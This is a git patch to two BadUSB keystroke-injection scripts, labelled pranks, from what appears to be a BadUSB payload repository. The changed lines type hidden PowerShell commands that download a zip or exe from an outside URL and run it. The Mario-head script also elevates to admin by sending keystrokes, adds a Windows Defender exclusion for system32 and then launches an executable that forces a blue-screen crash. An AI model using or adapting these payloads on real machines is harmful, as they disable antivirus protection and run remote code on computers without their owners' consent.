From 3a577f579198b8b501ad2919275cd0d0a9f83ace Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Sun, 28 Aug 2022 11:03:14 -0600 Subject: [PATCH] No rehosting the binary~sam person --- BadUSB/Honk.txt | 6 +++--- BadUSB/Mario-head.txt | 18 ++++++++++-------- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/BadUSB/Honk.txt b/BadUSB/Honk.txt index 1dba9a35..210b7901 100644 --- a/BadUSB/Honk.txt +++ b/BadUSB/Honk.txt @@ -1,10 +1,10 @@ REM Title: Desktop Goose REM Author: FalsePhilosopher REM Target: Windows 10+ -REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,jakoby for some PS bits I used, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes +REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes REM Version: 1.0 REM Category: Prank -REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? +REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? The creator of desktop goose told me I CAN NOT redistribute his binary. So you need to host your own desktop goose zip named dg.zip REM REM startup delay DELAY 300 @@ -13,5 +13,5 @@ DELAY 500 STRING powershell ENTER DELAY 2000 -STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit +STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl linktodesktopgoose.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit ENTER diff --git a/BadUSB/Mario-head.txt b/BadUSB/Mario-head.txt index 1d839713..579f4918 100644 --- a/BadUSB/Mario-head.txt +++ b/BadUSB/Mario-head.txt @@ -1,22 +1,24 @@ REM Title: Mario-Head BSOD REM Author: FalsePhilosopher -REM Target: Windows 7 and up 32/64 bit +REM Target: Win 10+, exe is Windows 7 and up 32/64 bit REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes REM Version: 1.0 REM Category: Prank REM Display a video of Mario's levitating head asking if he can have your computer and invokes a BSOD. REM REM startup delay -DELAY 300 +DELAY 500 GUI r DELAY 500 STRING powershell Start-Process powershell -Verb runAs -ENTER -DELAY 3000 -ALT y -DELAY 2000 -STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 ENTER DELAY 1500 -STRING $down = New-Object System.Net.WebClient; $url = 'https://github.com/bemxio/mario-head/releases/latest/download/mario_dist.exe'; $file = 'mario_dist.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/bemxio/mario-head/releases/latest/download/mario_dist.exe';$file='mario_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit ENTER